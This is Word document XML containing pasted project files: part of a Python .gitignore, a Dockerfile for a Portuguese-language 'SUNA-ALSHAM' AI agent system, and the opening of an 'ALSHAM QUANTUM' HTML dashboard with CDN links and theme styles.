    <w:p w14:paraId="747CE84E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E8F8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mkdocs documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629677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/site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4179FD31" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF316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mypy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BADFE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.mypy_cache/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0DF7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.dmypy.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEDE5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dmypy.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B8072" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFB79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Pyre type checker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566BF0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.pyre/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602BB3A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D55B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pytype static type analyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611546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.pytype/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D48C2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321CE1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Cython debug symbols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190FD0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cython_debug/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB5832B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6475C0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PyCharm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146775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JetBrains specific template is maintained in a separate JetBrains.gitignore that can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600519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be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9EEC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and can be added to the global gitignore or merged into this file.  For a more nuclear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D290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option (not recommended) you can uncomment the following to ignore the entire idea folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360CDF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#.idea/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EBFFE0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C40C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Abstra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2B88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Abstra is an AI-powered process automation framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231175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Ignore directories containing user credentials, local state, and settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC786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Learn more at https://abstra.io/docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C0E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.abstra/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C188AB4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748DD8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Visual Studio Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE7B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#  Visual Studio Code specific template is maintained in a separate VisualStudioCode.gitignore </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26900E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that can be found at https://github.com/github/gitignore/blob/main/Global/VisualStudioCode.gitignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F99A0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#  and can be added to the global gitignore or merged into this file. However, if you prefer, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA2E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you could uncomment the following to ignore the entire vscode folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CD49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.vscode/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4892958D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A801D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Ruff stuff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFAE0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.ruff_cache/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3692AB40" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C08B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PyPI configuration file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC67B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.pypirc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656EE9F2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B11C9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Cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AAC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Cursor is an AI-powered code editor. `.cursorignore` specifies files/directories to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A8B2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exclude from AI features like autocomplete and code analysis. Recommended for sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFE2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 refer to https://docs.cursor.com/context/ignore-files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092374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.cursorignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302792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.cursorindexingignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792478AC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073663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Marimo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C934F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marimo/_static/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A2D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marimo/_lsp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBC9AF3" w14:textId="0C179FB1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__marimo__/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF3A5E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2400D0" w14:textId="5D3D6BF3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Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3FC41" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># =====================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711103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SUNA-ALSHAM Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B5E2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Sistema de Agentes Auto-Evolutivos com AutoML Real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC29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=====================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2D5AE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AEC2B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Base image otimizada para Python e ML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115695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python:3.11-slim-bullseye</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B6FC28" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F46C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Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7305F3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LABEL maintainer="SUNA-ALSHAM Team"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46540F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LABEL description="Sistema Auto-Evolutivo de IA com AutoML Real"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F270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LABEL version="2.1.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD38B0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD4B3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Variáveis de ambiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EB57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ENV PYTHONUNBUFFERED=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568348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ENV PYTHONDONTWRITEBYTECODE=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057990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ENV PIP_NO_CACHE_DIR=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B053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ENV PIP_DISABLE_PIP_VERSION_CHECK=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8CC614" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3997D3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Configurações do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A6D2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ENV DEBIAN_FRONTEND=noninteractive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE621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ENV TZ=UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F799A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1608BD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Criar usuário não-root para segurança</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F4A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RUN groupadd --gid 1000 suna &amp;&amp; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC6D7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useradd --uid 1000 --gid suna --shell /bin/bash --create-home suna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29564CF5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED30C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Instalar dependências do sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319DE3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RUN apt-get update &amp;&amp; apt-get install -y \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D31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curl \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD84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wget \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B94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git \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3BDD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build-essential \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA55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gcc \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0ED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g++ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A187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libopenblas-dev \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8F8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liblapack-dev \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2B4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gfortran \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FF7B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libpq-dev \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243D64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postgresql-client \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62352F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&amp;&amp; apt-get clean \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74D1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&amp;&amp; rm -rf /var/lib/apt/lists/* \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A760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&amp;&amp; rm -rf /tmp/* \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31242C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&amp;&amp; rm -rf /var/tmp/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C170BB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0E90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Definir diretório de trabalho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE0F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WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78292A21" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E422C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Copiar requirements primeiro (para cache do Docker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB99A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COPY requirements.txt .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A683728" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B189E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Instalar dependências Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A78D1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RUN pip install --no-cache-dir --upgrade pip setuptools wheel &amp;&amp; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6F7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pip install --no-cache-dir -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0872247F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DEEC8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Copiar código da aplicação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C85D8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COPY . .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CAEEDB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353A3D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Criar diretórios necessários</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166466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RUN mkdir -p /app/logs \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C042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/app/data \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC09F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/app/mlruns \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB94D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/app/optuna_storage \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D318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&amp;&amp; chown -R suna:suna /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7145C5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8E7D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Configurar permissões</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176F41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RUN chmod +x suna_alsham_bootstrap.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E6F61" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A39A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Mudar para usuário não-root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13769E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USER suna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898B660" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259960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Expor porta (Railway define automaticamente)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080BC6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EXPOSE 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D31393" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA2D7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Health check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444469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HEALTHCHECK --interval=30s --timeout=10s --start-period=60s --retries=3 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7E68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CMD python -c "import requests; requests.get('http://localhost:8000/health', timeout=5 )" || exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7F5F63" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="547B66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Comando padrão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF2324F" w14:textId="366DD53D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CMD ["python", "suna_alsham_bootstrap.py"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315F65A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8903F6" w14:textId="57D0AD89" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r w:rsidRPr="006D02FF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B9E3A28" wp14:editId="4FD1EE3B">
            <wp:extent cx="8773749" cy="7925906"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="67589016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9016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73749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5F6E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="63446B8F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="58B16498" w14:textId="160D5F61" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r w:rsidRPr="006D02FF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A10BC0C" wp14:editId="5ABA3B05">
            <wp:extent cx="5896798" cy="3858163"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="12448095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095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983D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="3254A98D" w14:textId="37824210" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r w:rsidRPr="006D02FF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2D29EB" wp14:editId="60BD3EF4">
            <wp:extent cx="11593543" cy="4772691"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8890"/>
            <wp:docPr id="194597605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7605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9354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E58C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="22D2B91F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="75FE4CC6" w14:textId="1D6080DE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dashboard_mobile.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA726A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC9C1FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16236E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&lt;html lang="pt-BR"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68525C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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8F8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charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CDA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name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, viewport-fit=cover"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE915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&lt;title&gt;ALSHAM QUANTUM - Enterprise Neural Platform&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF376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D134F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PWA Meta Tags --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DBC1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name="theme-color" content="#F4D03F"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619833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name="apple-mobile-web-app-capable" content="yes"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC01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name="apple-mobile-web-app-status-bar-style" content="black-translucent"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCF83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name="apple-mobile-web-app-title" content="ALSHAM QUANTUM"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9E6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name="application-name" content="ALSHAM QUANTUM"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B33A0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name="msapplication-TileColor" content="#1a1a2e"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697F0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DFF8B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Security Headers --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA113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http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' 'unsafe-eval' https: wss: data: blob:; connect-src 'self' https: wss: data:;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A6C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http-equiv="X-Content-Type-Options" content="nosniff"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC52D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http-equiv="X-Frame-Options" content="DENY"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E2D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http-equiv="X-XSS-Protection" content="1; mode=block"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D28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CE671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CDN Libraries --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A9D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&lt;link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C99C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&lt;link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.4.0/css/all.min.css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7884F8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&lt;link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700;900&amp;family=Inter:wght@300;400;500;600;700&amp;display=swap" rel="stylesheet"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F84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9ED52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&lt;script src="https://cdn.jsdelivr.net/npm/chart.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00957B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&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.12.2/gsap.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B70F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&lt;script src="https://cdn.jsdelivr.net/npm/three@0.158.0/build/three.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DDE8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&lt;script src="https://cdn.jsdelivr.net/npm/countup.js@2.6.2/dist/countUp.umd.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3F8AFB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C3AD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&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EBA9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:root {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C54A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/* ALSHAM QUANTUM Corporate Color Palette */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C460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--quantum-gold: #F4D03F;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBDD8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--quantum-blue: #1F618D;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472529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--quantum-purple: #6C3483;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF04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--corporate-dark: #2C3E50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B03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--enterprise-green: #2ECC71;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568D1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--platinum-white: #FDFEFE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21360F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--deep-space: #020C1B;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C95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7DE18AD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6573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QUANTUM GLASS THEME (DEFAULT) === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FC6B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.theme-quantum-glass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BAD8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--bg-primary: linear-gradient(135deg, #1a1a2e 0%, #16213e 50%, #0f3460 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FDA5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--bg-card: rgba(255, 255, 255, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C726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--bg-secondary: rgba(0, 245, 255, 0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010FB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--text-primary: #ffffff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B0F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--text-secondary: #b0c4de;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE2E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--accent-primary: var(--quantum-gold);</w:t>
      </w:r>
    </w:p>
